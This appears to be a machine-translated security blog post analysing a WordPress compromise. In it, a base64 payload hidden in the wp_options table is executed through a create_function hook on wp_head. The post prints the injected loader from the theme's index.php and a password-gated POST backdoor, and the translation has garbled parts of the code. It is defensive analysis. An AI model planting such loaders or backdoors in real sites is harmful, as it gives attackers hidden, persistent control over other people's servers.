WordPress Injections – (Database and wp_head)

wp-malwareThere are several places where malware can be hidden in a web site. In WordPress, for example, can be hidden within the core files, themes, plugins, .htaccess and database. More often, the malware uses a combination thereof to hinder detection.

Today we will talk about one injection in the database that we are often seeing in recent cases, that uses the wp_head () to display the malware to anyone who visits the compromised site.

Injection in Database

WordPress offers multiple API calls to read and manage content from within the database. One such function is called get_Option that returns a value from the table wp_options. The table wp_options is widely used by many plugins and themes to store the data, and is usually full of entries, making it a good place to hide malicious code.

If you do not believe and uses WordPress, just list the table wp_options to your site to see what we’re talking about.

Here’s what we’re finding in the table wp_options, on “page_options” in some compromised sites:

s: 7546: “a: 18: {i: 0; s: 10:” 07/11/2013 “; i: 1; s: 1:” and “; i: 2; s: 32:” 061d57e97e504a23cc932031f712f730 “;
i: 3; s: 32: “07b6910226033fa5ee75721b4fc6573f”;
i: 4; s: 4: “val (“; i: 5; s: 32: “2a27230f54e4cea4a8ed38d66e2c0”;
i: 6; s: 1: “(“; i: 7; s: 6993: “‘LyogTXVuaW5uIHZlcnNpb246MSBkYXRlOjIxLj
G9mZnNldD0wKSB7CgkJcmV0dXJuIHN0cnBvcyAoc3RydG …
… Very long ..

As you can see, is a serialized PHP entry (decoded in ddecode) which at first glance does not seem so bad and really cannot do any damage on their own.

Running the contents of the database

The malicious code was hidden inside the database, but how can it be implemented? The attackers, in addition to injecting this content, also edited the file index.php of the theme with this code:

page_options function () {$ option = get_Option (“page_option”); $ Opt = unserialize ($ option);
@ $ Arg = create_function (“”, $ opt [1] $ opt [4] $ opt [10] $ opt [12] $ opt [14] $ opt [7]…..);
return $ arg (”);}
add_action (‘wp_head’, ‘page_options’);

And this is where everything comes together.

This code uses the get_Option to download the content of “page_option” database: get_Option (“page_option”);
Because the content is serialized, unserialize () : $ opt = unserialize ($ option);

So it builds a new function called $ arg and executes based on the retrieved content. Only when this function is executed, the malware runs live: @ $ arg = create_function …

The final piece of the puzzle is done by the function add_action (). It plays the role of the attacker to run on the head (start) of WordPress.

The interesting thing is that with a simple code, they are able to bypass most of the security tools that look for eval, base64_decode or system calls for a sign of commitment.

Backdoor + Injection

This malware, once installed on a compromised site, acts as backdoor (running the values of POST variables in Thor and Hammer):

if (@ md5 ($ _ POST [‘pass’]) === ‘692e3f52ee6f16bc78fa6e1ec4bd4a6a’) {
extract ($ _POST, EXTR_SKIP);
if (! empty ($ thor))
Thor @ $ ($ hammer);

This malware also injects malicious code related to “Counter WordPress injection” in any browser visiting the site (downloaded from command and control site: httx: //website.com/page).


You cannot rely on simple keyword search to identify the injection of malware. The attackers are evolving and using multiple tactics to hide their backdoors and malicious tools. If you need help to clean up a WordPress site, you can count on the services of eMagic Tool for Online Malware / Vulnerability Scanning of a Website.


Leave a Reply

Follow by Email